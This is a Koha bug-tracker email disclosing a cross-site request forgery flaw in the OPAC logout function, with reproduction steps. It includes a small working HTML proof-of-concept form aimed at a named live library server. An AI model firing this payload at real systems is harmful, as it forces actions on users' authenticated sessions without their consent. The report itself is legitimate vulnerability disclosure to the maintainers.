[Koha-bugs] [Bug 23238] New: CSRF On Logout Page
bugzilla-daemon at bugs.koha-community.org
bugzilla-daemon at bugs.koha-community.org
Sun Jun 30 14:48:48 CEST 2019
https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=23238
Bug ID: 23238
Summary: CSRF On Logout Page
Change sponsored?: ---
Product: Koha
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5 - low
Component: Web services
Assignee: koha-bugs at lists.koha-community.org
Reporter: anuragmewar at gmail.com
QA Contact: testopia at bugs.koha-community.org
Created attachment 91132
-->
https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=91132&action=edit
PFA the Google Drive link for the video
Vulnerability: CSRF on logout page
Vulnerability Description: Cross-Site Request Forgery (CSRF) is an attack that
forces an end user to execute unwanted actions on a web application in which
they're currently authenticated. With a little help of social engineering (such
as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's choosing.
Vulnerable URL: https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl">
<input type="hidden" name="logout.x" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps to reproduce:
1. Login with valid credentials
2. Start any proxy tool to intercept the request.
3. Click logout
4. Send to "repeator"
5. Change "referer" header
6. Observe the output
7. Create an HTML file using the CSRF POC mentioned above
8. Login again
9. Open the CSRF html file on a new tab
10. Submit request
11. Results would reflect on main account
POC:
PFA the video
--
You are receiving this mail because:
You are the assignee for the bug.
You are watching all bug changes.
More information about the Koha-bugs
mailing list